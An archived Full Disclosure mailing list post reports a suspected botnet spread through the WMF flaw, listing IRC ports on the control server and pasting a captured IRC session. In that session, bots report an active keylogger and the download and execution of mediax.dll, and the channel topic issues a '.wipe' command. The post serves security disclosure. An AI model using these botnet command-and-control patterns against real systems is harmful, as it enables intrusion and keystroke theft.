Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Possible large botnet
From: "Pablo Esterban" <pablo_esterban () hotmail com>
Date: Fri, 20 Jan 2006 06:35:45 +0000

Seems to be a botnet forming with the help of exploiting the recent wmf flaw on the following site. AFAIK malware/adware is referencing this.

************D O  N O T  C L I C K************
************D O  N O T  C L I C K************

This injects a trojan connecting to on port 44234

44234/tcp open     irc          Unreal ircd
47292/tcp open     irc          Unreal ircd
47296/tcp open     irc          Unreal ircd
54729/tcp open     irc-proxy    psyBNC 2.3.1

Channel stats list around 500 bots and around 1200 connected (may or may not be accurate), however if you poke around you will find, containing some interesting links and info about when this most likely started.

The tcp stream below demos the login, and calling of Stats for January list close to 90k hits on this particular file(!).

NICK *****

USER plnaehe 0 0 :*****

:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...

:irc.foonet.com NOTICE AUTH :*** Found your hostname

:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****

:irc.foonet.com 002 *****:Your host is irc.foonet.com, running version Unreal3.2.3

:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at 17:25:57 KST

:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server

:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG= () %+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server

:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers

:irc.foonet.com 252 *****1 :operator(s) online

:irc.foonet.com 253 *****201 :unknown connection(s)

:irc.foonet.com 254 *****10 :channels formed

:irc.foonet.com 255 *****:I have 1195 clients and 0 servers

:irc.foonet.com 265 *****:Current Local Users: 1195  Max: 5529

:irc.foonet.com 266 *****:Current Global Users: 1195  Max: 1276

:irc.foonet.com 422 *****:MOTD File is missing

*****MODE *****:+iwTxd


:irc.foonet.com 302 *****:*****

MODE *****-x+B

JOIN #mrbean5 rowan

PRIVMSG *****:[KEYLOG]: Key logger active.


MODE *****-x+B

JOIN #mrbean5 rowan


MODE *****-x+B

JOIN #mrbean5 rowan

:irc.foonet.com NOTICE *****:BOTMOTD File not found

*****MODE *****:-x+B

***** JOIN :#mrbean5

:irc.foonet.com 332 *****#mrbean5 :.wipe mediax.dll 3

:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387

:irc.foonet.com 353 *****@ #mrbean5 *****

:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.

*****PRIVMSG *****:[KEYLOG]: Key logger active.

:irc.foonet.com 302 *****

:irc.foonet.com 302 *****

PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: to: mediax.dll.

:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)

PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.

PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.

:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)

:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)

Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]